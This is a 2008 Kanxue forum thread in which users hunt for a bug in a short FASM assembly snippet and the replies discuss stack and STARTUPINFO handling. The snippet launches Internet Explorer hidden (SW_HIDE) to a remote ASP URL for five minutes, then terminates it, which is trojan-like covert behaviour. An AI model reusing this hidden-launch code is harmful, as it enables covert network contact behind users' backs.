首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 编程技术
    3. 发新帖
[讨论]代码找茬大家来
发表于: 2008-9-2 21:10 5110

[讨论]代码找茬大家来

xfish 活跃值
5
2008-9-2 21:10
5110
代码找茬大家来:

    呵呵,   大家看下下面这段代码有无问题, 如果不了解FASM语法的,直接给附件看汇编代码,但是不能调试,看看这段代码那里有问题呢? 呵呵

     
	   format PE GUI 4.0 
	   include	'win32ax.inc'
	
.text

entry $
			
		sub esp,512
		
		mov ebp,esp
		
		i ExpandEnvironmentStrings,'%ProgramFiles%\Internet Explorer\iexplore.exe',ebp,ebp
		
		add eax,ebp
		
		xchg eax, edi
		
		i GetStartupInfo,edi,\
				ebp,'http://www.123.com/editor/editor/config.asp',ecx,ecx,ecx,ecx,ecx,ecx=0,edi,ebp

		mov [eax+STARTUPINFO.wShowWindow],SW_HIDE

		i CreateProcess,
		
		i Sleep,1000*60*5
		
		i TerminateProcess,dword [ebp]
		
		jmp [ExitProcess]

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

上传的附件:
收藏
免费 0
支持
分享
最新回复 (4)
雲飛揚
雪    币: 251
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
FASM接触不多, FASM 和 NASM 有什么区别 ?
2008-9-3 08:46
0
XPoy
雪    币: 242
活跃值: (443)
能力值: ( LV11,RANK:188 )
在线值:
发帖
回帖
粉丝
私信
3
sub esp,512
   
    mov ebp,esp

堆栈?
2008-9-3 11:38
0
executehk
雪    币: 209
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
i GetStartupInfo,edi,\
        ebp,'http://www.123.com/editor/editor/config.asp',ecx,ecx,ecx,ecx,ecx,ecx=0,edi,ebp
i GetStartupInfo,edi,\这句上,

要是ebp指向的字符串长度小,就会被i CreateProcess这个函数执行后,会填写ebp指向的process_info
那么EDI指向的Satart_info部分数据就会被process_info覆盖
2008-9-3 18:57
0
洋洋洒洒
雪    币: 249
活跃值: (10)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
私信
5
CreateProcess 先读取start_info 之后才写process_info
这里没问题
2008-9-3 19:25
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//